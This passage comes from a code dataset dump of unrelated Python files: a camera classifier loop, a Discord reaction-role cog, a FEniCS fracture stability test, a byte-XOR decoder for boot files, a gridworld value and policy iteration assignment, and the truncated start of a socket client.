0)\n ui.display()\n\n @ui.warp_template(ui.blank_draw)\n def maybe():\n tmp = camera.obj.get_image()\n MaybeIs.work(tmp)\n ui.canvas.draw_image(tmp, 0, 0)\n ui.display()\n\n import time\n last = time.ticks_ms()\n while True:\n try:\n HowMany.load()\n while True:\n try:\n print(time.ticks_ms() - last)\n last = time.ticks_ms()\n howmany()\n except Exception as e:\n # gc.collect()\n print(e)\n except KeyboardInterrupt as e:\n HowMany.free()\n #break\n try:\n MaybeIs.load()\n while True:\n try:\n print(time.ticks_ms() - last)\n last = time.ticks_ms()\n maybe()\n except Exception as e:\n # gc.collect()\n print(e)\n except KeyboardInterrupt as e:\n MaybeIs.free()\n #break\n\n test_ai_camera()\n\n","sub_path":"driver/classify20.py","file_name":"classify20.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"73256827","text":"from discord.ext import commands\r\nimport discord\r\nimport json\r\nimport os\r\n\r\n# Requires message intent for role remove\r\n\r\nclass RoleAssign(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.load()\r\n\r\n def save(self):\r\n with open('roleconfig.json', 'w') as fp:\r\n json.dump(self.watchedMessages, fp, indent=4)\r\n\r\n def load(self):\r\n if os.path.exists('roleconfig.json'):\r\n with open('roleconfig.json', 'r') as fp:\r\n self.watchedMessages = json.load(fp)\r\n self.watchedMessages = {int(x):self.watchedMessages[x] for x in self.watchedMessages}\r\n else:\r\n self.watchedMessages = {} # structure will be msgid = {emoji1:role1, emoji2:role2}\r\n self.save()\r\n\r\n @commands.command()\r\n async def createAssignMsg(self, ctx, *args):\r\n msg = await ctx.send('React to get the following roles!')\r\n self.watchedMessages[msg.id] = {}\r\n for i in range(1, len(args), 2):\r\n await msg.add_reaction(args[i])\r\n self.watchedMessages[msg.id][args[i]] = int(args[i-1][3:-1])\r\n\r\n await self.editmessage(msg)\r\n self.save()\r\n\r\n async def editmessage(self, msg):\r\n s = 'React to get the following roles!'\r\n for e in self.watchedMessages[msg.id]:\r\n r = discord.utils.get(msg.guild.roles, id = self.watchedMessages[msg.id][e])\r\n s += '\\n{} : {}'.format(e, r.mention)\r\n await msg.edit(content = s)\r\n\r\n\r\n @commands.command()\r\n async def addRole(self, ctx, *args):\r\n msg = await ctx.channel.history().get(author = self.bot.user)\r\n for i in range(1, len(args), 2):\r\n await msg.add_reaction(args[i])\r\n self.watchedMessages[msg.id][args[i]] = int(args[i-1][3:-1])\r\n await self.editmessage(msg)\r\n\r\n @commands.command()\r\n async def removeRole(self, ctx, *args):\r\n msg = await ctx.channel.history().get(author = self.bot.user)\r\n for e in args:\r\n del self.watchedMessages[msg.id][e]\r\n await msg.clear_reaction(e)\r\n await self.editmessage(msg)\r\n\r\n\r\n @commands.Cog.listener()\r\n async def on_raw_reaction_add(self, payload):\r\n if payload.member == self.bot.user:\r\n return\r\n elif payload.message_id in self.watchedMessages:\r\n r = discord.utils.get(payload.member.guild.roles, id = self.watchedMessages[payload.message_id][str(payload.emoji)])\r\n await payload.member.add_roles(r)\r\n\r\n @commands.Cog.listener()\r\n async def on_raw_reaction_remove(self, payload):\r\n if payload.message_id in self.watchedMessages:\r\n g = self.bot.get_guild(payload.guild_id)\r\n m = g.get_member(payload.user_id)\r\n r = discord.utils.get(g.roles, id = self.watchedMessages[payload.message_id][str(payload.emoji)])\r\n await m.remove_roles(r)\r\n","sub_path":"ExampleCogs/RoleAssign.py","file_name":"RoleAssign.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2308581","text":"# sys.path.append(\"../src/\")\nimport sys\nsys.path.append(\"../src/\")\n# from post_processing import compute_sig, local_project\nimport site\nimport sys\n\nimport pandas as pd\n\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport mshr\nimport dolfin\nfrom dolfin import MPI\nimport os\nimport sympy\nimport numpy as np\n# import post_processing as pp\nimport petsc4py\nfrom functools import reduce\nimport ufl\n\npetsc4py.init(sys.argv)\n\nfrom petsc4py import PETSc\n# from hashlib import md5\nfrom pathlib import Path\nimport json\nimport hashlib\n\nfrom copy import deepcopy\n\nimport mpi4py\n\ncomm = mpi4py.MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\nfrom dolfin.cpp.log import log, LogLevel, set_log_level\ndolfin.parameters[\"std_out_all_processes\"] = False\n\nfrom solvers import EquilibriumAM\nfrom solver_stability import StabilitySolver\nfrom linsearch import LineSearch\n\n# from dolfin import NonlinearProblem, derivative, \\\n# TrialFunction, TestFunction, inner, assemble, sqrt, \\\n# Constant, interpolate, RectangleMesh, Point\n\nfrom dolfin import *\nimport yaml\n\nfrom utils import get_versions\ncode_parameters = get_versions()\n\nset_log_level(LogLevel.INFO)\n\n\n\ndef getDefaultParameters():\n\n with open('../parameters/form_compiler.yml') as f:\n form_compiler_parameters = yaml.load(f, Loader=yaml.FullLoader)\n with open('../parameters/solvers_default.yml') as f:\n equilibrium_parameters = yaml.load(f, Loader=yaml.FullLoader)['equilibrium']\n with open('../parameters/solvers_default.yml') as f:\n damage_parameters = yaml.load(f, Loader=yaml.FullLoader)['damage']\n with open('../parameters/solvers_default.yml') as f:\n elasticity_parameters = yaml.load(f, Loader=yaml.FullLoader)['elasticity']\n with open('../parameters/model1d.yaml') as f:\n material_parameters = yaml.load(f, Loader=yaml.FullLoader)['material']\n with open('../parameters/loading.yaml') as f:\n loading_parameters = yaml.load(f, Loader=yaml.FullLoader)['loading']\n with open('../parameters/stability.yaml') as f:\n stability_parameters = yaml.load(f, Loader=yaml.FullLoader)['stability']\n with open('../parameters/stability.yaml') as f:\n inertia_parameters = yaml.load(f, Loader=yaml.FullLoader)['inertia']\n with open('../parameters/stability.yaml') as f:\n eigen_parameters = yaml.load(f, Loader=yaml.FullLoader)['eigen']\n\n default_parameters = {\n 'code': {**code_parameters},\n 'compiler': {**form_compiler_parameters},\n 'eigen': {**eigen_parameters},\n # 'geometry': {**geometry_parameters},\n 'inertia': {**inertia_parameters},\n 'loading': {**loading_parameters},\n 'material': {**material_parameters},\n # 'newton': {**newton_parameters},\n 'equilibrium':{**equilibrium_parameters},\n 'damage':{**damage_parameters},\n 'elasticity':{**elasticity_parameters},\n 'stability': {**stability_parameters},\n }\n\n return default_parameters\n \ndef numerical_test(\n user_parameters,\n ell=0.05,\n nu=0.,\n):\n time_data = []\n time_data_pd = []\n spacetime = []\n lmbda_min_prev = 1e-6\n bifurcated = False\n bifurcation_loads = []\n save_current_bifurcation = False\n bifurc_i = 0\n bifurcation_loads = []\n\n # Create mesh and define function space\n geometry_parameters = {'Lx': 1., 'Ly': .1, 'n': 5}\n\n # Define Dirichlet boundaries\n outdir = '../test/output/test_secondorderevo'\n Path(outdir).mkdir(parents=True, exist_ok=True)\n\n\n with open('../parameters/form_compiler.yml') as f:\n form_compiler_parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n with open('../parameters/solvers_default.yml') as f:\n solver_parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n with open('../parameters/model1d.yaml') as f:\n material_parameters = yaml.load(f, Loader=yaml.FullLoader)['material']\n\n with open('../parameters/loading.yaml') as f:\n loading_parameters = yaml.load(f, Loader=yaml.FullLoader)['loading']\n\n with open('../parameters/stability.yaml') as f:\n stability_parameters = yaml.load(f, Loader=yaml.FullLoader)['stability']\n\n Path(outdir).mkdir(parents=True, exist_ok=True)\n\n print('Outdir is: '+outdir)\n\n default_parameters = {\n 'code': {**code_parameters},\n 'compiler': {**form_compiler_parameters},\n 'geometry': {**geometry_parameters},\n 'loading': {**loading_parameters},\n 'material': {**material_parameters},\n 'solver':{**solver_parameters},\n 'stability': {**stability_parameters},\n }\n\n default_parameters.update(user_parameters)\n # FIXME: Not nice\n parameters = default_parameters\n\n with open(os.path.join(outdir, 'parameters.yaml'), \"w\") as f:\n yaml.dump(parameters, f, default_flow_style=False)\n\n Lx = parameters['geometry']['Lx']; Ly = parameters['geometry']['Ly']\n ell = parameters['material']['ell']\n comm = MPI.comm_world\n geom = mshr.Rectangle(dolfin.Point(-Lx/2., -Ly/2.), dolfin.Point(Lx/2., Ly/2.))\n # import pdb; pdb.set_trace()\n # resolution = max(geometry_parameters['n'] * Lx / ell, 1/(Ly*10))\n resolution = max(geometry_parameters['n'] * Lx / ell, 5/(Ly*10))\n resolution = 50\n mesh = mshr.generate_mesh(geom, resolution)\n meshf = dolfin.File(os.path.join(outdir, \"mesh.xml\"))\n meshf << mesh\n plot(mesh)\n plt.savefig(os.path.join(outdir, \"mesh.pdf\"), bbox_inches='tight')\n\n savelag = 1\n left = dolfin.CompiledSubDomain(\"near(x[0], -Lx/2.)\", Lx=Lx)\n right = dolfin.CompiledSubDomain(\"near(x[0], Lx/2.)\", Lx=Lx)\n left_bottom_pt = dolfin.CompiledSubDomain(\"near(x[0],-Lx/2.) && near(x[1],-Ly/2.)\", Lx=Lx, Ly=Ly)\n\n mf = dolfin.MeshFunction(\"size_t\", mesh, 1, 0)\n right.mark(mf, 1)\n left.mark(mf, 2)\n\n ds = dolfin.Measure(\"ds\", subdomain_data=mf)\n dx = dolfin.Measure(\"dx\", metadata=form_compiler_parameters, domain=mesh)\n\n # Function Spaces\n V_u = dolfin.VectorFunctionSpace(mesh, \"CG\", 1)\n V_alpha = dolfin.FunctionSpace(mesh, \"CG\", 1)\n u = dolfin.Function(V_u, name=\"Total displacement\")\n alpha = Function(V_alpha)\n dalpha = TrialFunction(V_alpha)\n alpha_bif = dolfin.Function(V_alpha)\n alpha_bif_old = dolfin.Function(V_alpha)\n\n\n state = {'u': u, 'alpha': alpha}\n Z = dolfin.FunctionSpace(mesh, \n dolfin.MixedElement([u.ufl_element(),alpha.ufl_element()]))\n z = dolfin.Function(Z)\n v, beta = dolfin.split(z)\n\n ut = dolfin.Expression(\"t\", t=0.0, degree=0)\n bcs_u = [dolfin.DirichletBC(V_u.sub(0), dolfin.Constant(0), left),\n dolfin.DirichletBC(V_u.sub(0), ut, right),\n dolfin.DirichletBC(V_u, (0, 0), left_bottom_pt, method=\"pointwise\")]\n\n bcs_alpha_l = DirichletBC(V_alpha, Constant(0.0), left)\n bcs_alpha_r = DirichletBC(V_alpha, Constant(0.0), right)\n # bcs_alpha =[bcs_alpha_l, bcs_alpha_r]\n bcs_alpha = []\n\n bcs = {\"damage\": bcs_alpha, \"elastic\": bcs_u}\n\n # import pdb; pdb.set_trace()\n\n ell = parameters['material']['ell']\n\n # Problem definition\n # Problem definition\n k_res = parameters['material']['k_res']\n a = (1 - alpha) ** 2. + k_res\n w_1 = parameters['material']['sigma_D0'] ** 2 / parameters['material']['E']\n w = w_1 * alpha\n eps = sym(grad(u))\n lmbda0 = parameters['material']['E'] * parameters['material']['nu'] /(1. - parameters['material']['nu'])**2.\n mu0 = parameters['material']['E']/ 2. / (1.0 + parameters['material']['nu'])\n Wu = 1./2.* lmbda0 * tr(eps)**2. + mu0 * inner(eps, eps)\n\n energy = a * Wu * dx + w_1 *( alpha + \\\n parameters['material']['ell']** 2.*inner(grad(alpha), grad(alpha)))*dx\n\n eps_ = variable(eps)\n sigma = diff(a * Wu, eps_)\n e1 = dolfin.Constant([1, 0])\n\n file_out = dolfin.XDMFFile(os.path.join(outdir, \"output.xdmf\"))\n file_out.parameters[\"functions_share_mesh\"] = True\n file_out.parameters[\"flush_output\"] = True\n file_postproc = dolfin.XDMFFile(os.path.join(outdir, \"output_postproc.xdmf\"))\n file_postproc.parameters[\"functions_share_mesh\"] = True\n file_postproc.parameters[\"flush_output\"] = True\n file_eig = dolfin.XDMFFile(os.path.join(outdir, \"modes.xdmf\"))\n file_eig.parameters[\"functions_share_mesh\"] = True\n file_eig.parameters[\"flush_output\"] = True\n file_bif = dolfin.XDMFFile(os.path.join(outdir, \"bifurcation.xdmf\"))\n file_bif.parameters[\"functions_share_mesh\"] = True\n file_bif.parameters[\"flush_output\"] = True\n file_bif_postproc = dolfin.XDMFFile(os.path.join(outdir, \"bifurcation_postproc.xdmf\"))\n file_bif_postproc.parameters[\"functions_share_mesh\"] = True\n file_bif_postproc.parameters[\"flush_output\"] = True\n\n\n solver = EquilibriumAM(energy, state, bcs, parameters=parameters['solver'])\n stability = StabilitySolver(energy, state, bcs, parameters = parameters['stability'])\n linesearch = LineSearch(energy, state)\n\n xs = np.linspace(-parameters['geometry']['Lx']/2., parameters['geometry']['Lx']/2, 50)\n\n load_steps = np.linspace(parameters['loading']['load_min'],\n parameters['loading']['load_max'],\n parameters['loading']['n_steps'])\n log(LogLevel.INFO, '====================== EVO ==========================')\n log(LogLevel.INFO, '{}'.format(parameters))\n\n for it, load in enumerate(load_steps):\n log(LogLevel.CRITICAL, '====================== STEPPING ==========================')\n log(LogLevel.CRITICAL, 'CRITICAL: Solving load t = {:.2f}'.format(load))\n ut.t = load\n (time_data_i, am_iter) = solver.solve()\n\n # Second order stability conditions\n\n (stable, negev) = stability.solve(solver.damage.problem.lb)\n log(LogLevel.CRITICAL, 'Current state is{}stable'.format(' ' if stable else ' un'))\n\n # we postpone the update after the stability check\n solver.update()\n\n mineig = stability.mineig if hasattr(stability, 'mineig') else 0.0\n log(LogLevel.INFO, 'INFO: lmbda min {}'.format(lmbda_min_prev))\n log(LogLevel.INFO, 'INFO: mineig {}'.format(mineig))\n Deltav = (mineig-lmbda_min_prev) if hasattr(stability, 'eigs') else 0\n\n if (mineig + Deltav)*(lmbda_min_prev+dolfin.DOLFIN_EPS) < 0 and not bifurcated:\n bifurcated = True\n\n # save 3 bif modes\n print('About to bifurcate load ', load, 'step', it)\n bifurcation_loads.append(load)\n modes = np.where(stability.eigs < 0)[0]\n\n with dolfin.XDMFFile(os.path.join(outdir, \"postproc.xdmf\")) as file:\n leneigs = len(modes)\n maxmodes = min(3, leneigs)\n for n in range(maxmodes):\n mode = dolfin.project(stability.linsearch[n]['beta_n'], V_alpha)\n modename = 'beta-%d'%n\n print(modename)\n file.write_checkpoint(mode, modename, 0, append=True)\n\n bifurc_i += 1\n\n lmbda_min_prev = mineig if hasattr(stability, 'mineig') else 0.\n\n time_data_i[\"load\"] = load\n time_data_i[\"alpha_max\"] = max(alpha.vector()[:])\n time_data_i[\"elastic_energy\"] = dolfin.assemble(\n 1./2.* material_parameters['E']*a*eps**2. *dx)\n time_data_i[\"dissipated_energy\"] = dolfin.assemble(\n (w + w_1 * material_parameters['ell'] ** 2. * inner(grad(alpha), grad(alpha)))*dx)\n time_data_i[\"stable\"] = stability.stable\n time_data_i[\"# neg ev\"] = stability.negev\n time_data_i[\"eigs\"] = stability.eigs if hasattr(stability, 'eigs') else np.inf\n\n snn = dolfin.dot(dolfin.dot(sigma, e1), e1)\n time_data_i[\"sigma\"] = 1/parameters['geometry']['Ly'] * dolfin.assemble(snn*ds(1))\n\n log(LogLevel.INFO,\n \"Load/time step {:.4g}: iteration: {:3d}, err_alpha={:.4g}\".format(\n time_data_i[\"load\"],\n time_data_i[\"iterations\"][0],\n time_data_i[\"alpha_error\"][0]))\n\n time_data.append(time_data_i)\n time_data_pd = pd.DataFrame(time_data)\n\n if np.mod(it, savelag) == 0:\n with file_out as f:\n f.write(alpha, load)\n f.write(u, load)\n with dolfin.XDMFFile(os.path.join(outdir, \"output_postproc.xdmf\")) as f:\n f.write_checkpoint(alpha, \"alpha-{}\".format(it), 0, append = True)\n log(LogLevel.PROGRESS, 'PROGRESS: written step {}'.format(it))\n\n time_data_pd.to_json(os.path.join(outdir, \"time_data.json\"))\n\n spacetime.append(get_trace(alpha))\n\n\n if save_current_bifurcation:\n # modes = np.where(stability.eigs < 0)[0]\n\n time_data_i['h_opt'] = h_opt\n time_data_i['max_h'] = hmax\n time_data_i['min_h'] = hmin\n\n with file_bif_postproc as file:\n # leneigs = len(modes)\n # maxmodes = min(3, leneigs)\n beta0v = dolfin.project(stability.perturbation_beta, V_alpha)\n log(LogLevel.DEBUG, 'DEBUG: irrev {}'.format(alpha.vector()-alpha_old.vector()))\n file.write_checkpoint(beta0v, 'beta0', 0, append = True)\n file.write_checkpoint(alpha_bif_old, 'alpha-old', 0, append=True)\n file.write_checkpoint(alpha_bif, 'alpha-bif', 0, append=True)\n file.write_checkpoint(alpha, 'alpha', 0, append=True)\n\n np.save(os.path.join(outdir, 'energy_perturbations'), energy_perturbations, allow_pickle=True, fix_imports=True)\n\n with file_eig as file:\n _v = dolfin.project(dolfin.Constant(h_opt)*perturbation_v, V_u)\n _beta = dolfin.project(dolfin.Constant(h_opt)*perturbation_beta, V_alpha)\n _v.rename('perturbation displacement', 'perturbation displacement')\n _beta.rename('perturbation damage', 'perturbation damage')\n # import pdb; pdb.set_trace()\n f.write(_v, load)\n f.write(_beta, load)\n\n _spacetime = pd.DataFrame(spacetime)\n spacetime = _spacetime.fillna(0)\n mat = np.matrix(spacetime)\n plt.imshow(mat, cmap = 'Greys', vmin = 0., vmax = 1., aspect=.1)\n plt.colorbar()\n\n def format_space(x, pos, xresol = 100):\n return '$%1.1f$'%((-x+xresol/2)/xresol)\n\n def format_time(t, pos, xresol = 100):\n return '$%1.1f$'%((t-parameters['loading']['load_min'])/parameters['loading']['n_steps']*parameters['loading']['load_max'])\n\n from matplotlib.ticker import FuncFormatter, MaxNLocator\n\n ax = plt.gca()\n\n ax.yaxis.set_major_formatter(FuncFormatter(format_space))\n ax.xaxis.set_major_formatter(FuncFormatter(format_time))\n\n plt.xlabel('$x$')\n plt.ylabel('$t$')\n plt.savefig(os.path.join(outdir, \"spacetime.pdf\".format(load)), bbox_inches=\"tight\")\n\n spacetime.to_json(os.path.join(outdir + \"/spacetime.json\"))\n\n from matplotlib.ticker import FuncFormatter, MaxNLocator\n plot(alpha)\n plt.savefig(os.path.join(outdir, 'alpha.pdf'))\n log(LogLevel.INFO, \"Saved figure: {}\".format(os.path.join(outdir, 'alpha.pdf')))\n\n\n xs = np.linspace(-Lx/2., Lx/2., 100)\n profile = np.array([alpha(x, 0) for x in xs])\n plt.figure()\n plt.plot(xs, profile, marker='o')\n plt.plot(xs, np.array([u(x, 0) for x in xs]))\n # plt.ylim(0., 1.)\n plt.savefig(os.path.join(outdir, 'profile.pdf'))\n\n return time_data_pd, outdir\n\n\nfrom test_firstorderevo import get_trace\n# def get_trace(alpha, xresol = 100):\n# X =alpha.function_space().tabulate_dof_coordinates()\n# xs = np.linspace(min(X[:, 0]),max(X[:, 0]), xresol)\n# alpha0 = [alpha(x, 0) for x in xs]\n\n# return alpha0\n\nif __name__ == \"__main__\":\n\n # Parameters\n with open('../parameters/tractionbar.yml') as f:\n parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n data, experiment = numerical_test(user_parameters = parameters)\n print(data)\n\n log(LogLevel.INFO, \"Postprocess\")\n import postprocess as pp\n\n with open(os.path.join(experiment, 'parameters.yaml')) as f:\n parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n lab = '\\\\ell={}, E={}, \\\\sigma_D = {}'.format(\n parameters['material']['ell'],\n parameters['material']['E'],\n parameters['material']['sigma_D0'])\n tc = (parameters['material']['sigma_D0']/parameters['material']['E'])**(.5)\n ell = parameters['material']['ell']\n # import pdb; pdb.set_trace()\n fig1, ax1 =pp.plot_energy(parameters, data, tc)\n # visuals.setspines2()\n print(data['elastic_energy'])\n mu = parameters['material']['E']/2.\n # elast_en = [1./2.*2.*mu*eps**2 for eps in data['load']]\n # Lx = 1.\n # Ly = .1\n # Omega = Lx*Ly\n elast_en = [1./2.*parameters['material']['E']*eps**2 for eps in data['load']]\n plt.plot(data['load'], elast_en, c='k', label='analytic')\n plt.axhline(parameters['geometry']['Ly'], c='k')\n plt.legend()\n\n plt.ylim(0, 1.)\n plt.title('${}$'.format(lab))\n\n fig1.savefig(os.path.join(experiment, \"energy.pdf\"), bbox_inches='tight')\n\n (fig2, ax1, ax2) =pp.plot_spectrum(parameters, data, tc)\n plt.legend(loc='lower left')\n ax2.set_ylim(-1e-7, 2e-4)\n fig2.savefig(os.path.join(experiment, \"spectrum.pdf\"), bbox_inches='tight')\n\n\n","sub_path":"test/test_secondorderevo.py","file_name":"test_secondorderevo.py","file_ext":"py","file_size_in_byte":17200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"448520810","text":"#!/usr/bin/env python\n\n# https://idmdepot.com/Technical_Notes/IBM_Security_Access_Manager_Notes.html\n#\n# Inside grub / isolinux folder: boot.msg and img1a.cfg are the initial\n# syslinux message and the config file, xored with FF.\n\nimport sys\n\nPY3 = sys.version_info[0] == 3\n\ndef process_file(filename):\n data = open(filename, \"rb\").read()\n\n\n if PY3:\n output = \"\".join([chr(x ^ 0xff) for x in data])\n else:\n output = \"\".join([chr(ord(x) ^ 0xff) for x in data])\n\n print(output)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n sys.stderr.write(\"Usage: %s \\n\" % sys.argv[0])\n\n for i in range(1, len(sys.argv)):\n process_file(sys.argv[i])\n","sub_path":"unmask.py","file_name":"unmask.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433672280","text":"from matplotlib import pyplot as plt\nfrom gridWorld import gridWorld\nfrom copy import deepcopy\nimport numpy as np\n\ndef show_value_function(mdp, V):\n fig = mdp.render(show_state = False, show_reward = False) \n for k in mdp.states():\n s = k if isinstance(k, tuple) else mdp.legal_states[k]\n fig.axes[0].annotate(\"{0:.3f}\".format(V[k]), (s[1] - 0.1, s[0] + 0.1), size = 40/mdp.board_mask.shape[0])\n plt.show(block=False)\n \ndef show_policy(mdp, PI):\n fig = mdp.render(show_state = False, show_reward = False)\n action_map = {\"U\": \"↑\", \"D\": \"↓\", \"L\": \"←\", \"R\": \"→\"}\n for k in mdp.states():\n s = k if isinstance(k, tuple) else mdp.legal_states[k]\n if mdp.terminal[s] == 0:\n fig.axes[0].annotate(action_map[PI[k]], (s[1] - 0.1, s[0] + 0.1), size = 100/mdp.board_mask.shape[0])\n plt.show(block=False)\n\n#################### Problem 1: Value Iteration #################### \ndef sum_of_states(mdp, V, state, action):\n return np.sum([mdp.transition_probability(state, action, s)*(mdp.reward(s) + gamma*V[s]) for s in mdp.states()])\ndef value_iteration(mdp, gamma, theta = 1e-3):\n # Make a valuefunction, initialized to 0\n V = np.zeros((len(mdp.states())))\n its = 0\n \"\"\"\n YOUR CODE HERE:\n Problem 1a) Implement Value Iteration\n \n Input arguments:\n - mdp Is the markov decision process, it has some usefull functions given below\n - gamma Is the discount rate\n - theta Is a small threshold for determining accuracy of estimation\n \n Some usefull functions of the grid world mdp:\n - mdp.states() returns a list of all states [0, 1, 2, ...]\n - mdp.actions(state) returns list of actions [\"U\", \"D\", \"L\", \"R\"] if state non-terminal, [] if terminal\n - mdp.transition_probability(s, a, s_next) returns the probability p(s_next | s, a)\n - mdp.reward(state) returns the reward of the state R(s)\n \"\"\"\n max_deltV = 0\n V_old = np.zeros((len(mdp.states())))\n #raise Exception(\"Not implemented\")\n while True:\n delta = 0\n V_old = deepcopy(V)\n for s in mdp.states():\n v = V[s]\n if len(mdp.actions(s))==0:\n V[s] = mdp.reward(s)\n else: \n V[s] = np.max([np.sum([mdp.transition_probability(s, a, s_next)*(mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states()]) for a in mdp.actions(s)])\n delta = max(delta, abs(v - V[s]))\n if max_deltV < np.linalg.norm(V-V_old, np.inf):\n max_deltV = np.linalg.norm(V-V_old, np.inf)\n if delta < theta:\n break\n its += 1\n return V, max_deltV, its\n\ndef policy(mdp, V):\n # Initialize the policy list of crrect length\n PI = np.random.choice(env.actions(), len(mdp.states()))\n \n \"\"\"\n YOUR CODE HERE:\n Problem 1b) Implement Policy function \n \n Input arguments:\n - mdp Is the markov decision problem\n - V Is the optimal falue function, found with value iteration\n \"\"\"\n #raise Exception(\"Not implemented\")\n for s in mdp.states():\n if len(mdp.actions(s))==0:\n PI[s] = 0\n else:\n PI[s] = mdp.actions(s)[np.argmax([np.sum([mdp.transition_probability(s, a, s_next)*(mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states()]) for a in mdp.actions(s)])]\n return PI\n\n#################### Problem 2: Policy Iteration #################### \ndef policy_evaluation(mdp, gamma, PI, V, theta = 1e-3): \n \"\"\"\n YOUR CODE HERE:\n Problem 2a) Implement Policy Evaluation\n \n Input arguments: \n - mdp Is the markov decision problem\n - gamma Is discount factor\n - PI Is current policy\n - V Is preveous value function guess\n - theta Is small threshold for determining accuracy of estimation\n \n Some useful tips:\n - If you decide to do exact policy evaluation, np.linalg.solve(A, b) can be used\n optionally scipy has a sparse linear solver that can be used\n - If you decide to do exact policy evaluation, note that the b vector simplifies\n since the reward R(s', s, a) is only dependant on the current state s, giving the \n simplified reward R(s) \n \"\"\"\n n = len(mdp.states())\n A = np.zeros((n,n))\n b = np.zeros(n)\n for s in mdp.states():\n A[s] = gamma*np.array([mdp.transition_probability(s, PI[s], s_next) for s_next in mdp.states()])\n if len(mdp.actions(s))==0:\n b[s] = -mdp.reward(s)\n else:\n b[s] = -np.sum([mdp.transition_probability(s, PI[s], s_next)*mdp.reward(s) for s_next in mdp.states()])\n A[np.diag_indices(n)] -= 1\n V = np.linalg.solve(A, b)\n return V\n\ndef iterative_policy_evaluation(mdp, gamma, PI, V, theta = 1e-3): \n \"\"\"\n YOUR CODE HERE:\n Problem 2a) Implement Policy Evaluation\n \n Input arguments: \n - mdp Is the markov decision problem\n - gamma Is discount factor\n - PI Is current policy\n - V Is preveous value function guess\n - theta Is small threshold for determining accuracy of estimation\n \n Some useful tips:\n - If you decide to do exact policy evaluation, np.linalg.solve(A, b) can be used\n optionally scipy has a sparse linear solver that can be used\n - If you decide to do exact policy evaluation, note that the b vector simplifies\n since the reward R(s', s, a) is only dependant on the current state s, giving the \n simplified reward R(s) \n \"\"\"\n V = np.zeros((len(mdp.states())))\n while True:\n delta = 0\n for i in range(len(mdp.states())):\n s = mdp.states()[i]\n v = V[i]\n if len(mdp.actions(s)) == 0:\n V[i] = mdp.reward(s)\n else:\n V[i] = sum(mdp.transition_probability(s, PI[s], s_next) * (mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states())\n delta = max(delta, abs(v - V[i]))\n if delta < theta:\n break\n\n #print(V)\n return V\n\ndef policy_iteration(mdp, gamma):\n # Make a valuefunction, initialized to 0\n V = np.zeros((len(mdp.states())))\n \n # Create an arbitrary policy PI\n PI = np.random.choice(env.actions(), len(mdp.states()))\n its = 0\n \"\"\"\n YOUR CODE HERE:\n Problem 2b) Implement Policy Iteration\n \n Input arguments: \n - mdp Is the markov decision problem\n - gamma Is discount factor\n\n Some useful tips:\n - Use the the policy_evaluation function from the preveous subproblem\n \"\"\"\n #raise Exception(\"Not implemented\")\n max_deltV = 0\n V_OLD = np.zeros((len(mdp.states())))\n while True:\n PI_old = deepcopy(PI)\n V_OLD = deepcopy(V)\n V = policy_evaluation(mdp, gamma, PI, V)\n for i in range(len(mdp.states())):\n s = mdp.states()[i]\n if len(mdp.actions(s)) == 0:\n PI[i] = 0\n else:\n best_policy_idx = np.argmax([sum(mdp.transition_probability(s, a, s_next) * (mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states()) for a in mdp.actions(s)])\n PI[i] = mdp.actions(s)[best_policy_idx]\n if np.array_equal(PI, PI_old):\n break\n if max_deltV < np.linalg.norm(V-V_OLD, np.inf):\n max_deltV = np.linalg.norm(V-V_OLD, np.inf)\n its += 1\n return PI, V, max_deltV, its\n\nif __name__ == \"__main__\":\n \"\"\"\n Change the parameters below to change the behaveour, and map of the gridworld.\n gamma is the discount rate, while filename is the path to gridworld map. Note that\n this code has been written for python 3.x, and requiers the numpy and matplotlib\n packages\n\n Available maps are:\n - gridworlds/tiny.json\n - gridworlds/large.json\n \"\"\"\n gamma = 1\n filname = \"gridworlds/tiny.json\"\n\n\n # Import the environment from file\n env = gridWorld(filname)\n\n # Render image\n fig = env.render(show_state = False)\n plt.show()\n \n # Run Value Iteration and render value function and policy\n V, max_deltv, its = value_iteration(mdp = env, gamma = gamma)\n print(f'Value iteration:\\nmax_deltV: {max_deltv}, its: {its}')\n show_value_function(env, V)\n \n PI = policy(env, V)\n show_policy(env, PI)\n \n # Run Policy Iteration and render value function and policy\n PI, V, max_deltv, its = policy_iteration(mdp = env, gamma = gamma)\n print(f'Policy iteration:\\nmax_deltV: {max_deltv}, its: {its}')\n\n show_value_function(env, V)\n show_policy(env, PI)\n plt.show()\n","sub_path":"assignment1/assignment1.py","file_name":"assignment1.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50879703","text":"import socket\nimport string\nfrom datetime import datetime\n\nchoice = 1\nmessage = 'test'\nport = input('port: ')\nhost= raw_input('host: ')\nconnected = 0\nwasInFour = 0\nwhile choice < 5:\n print('Press:\\n1-to connect to host - necessarily!\\n2-to write & send the message\\n3-to send the default message\\n4-to close the connection\\n5-to quit')\n choice = input()\n if choice == 1:\n s =socket.socket()\n s.connect((host,port))\n wasInFour = 0\n current_datetime_connection = datetime.now()\n print('Client succesfully connected')\n if choice == 2: #Write a message\n # print()\n message = raw_input('Write a client message: ')\n choice = 3\n if choice == 3: #Connect+send+record+close\n current_datetime_sent = datetime.now()\n s.send(message.encode())\n # print ('sent: ' + str(current_datetime_sent) + \" - \" + message)\n with open('log_client.txt','a') as f:\n print ('file opened')\n print ('receiving data...')\n while True :\n data=s.recv(1024)\n if not data:\n break\n current_datetime_responce = datetime.now()\n # mes = 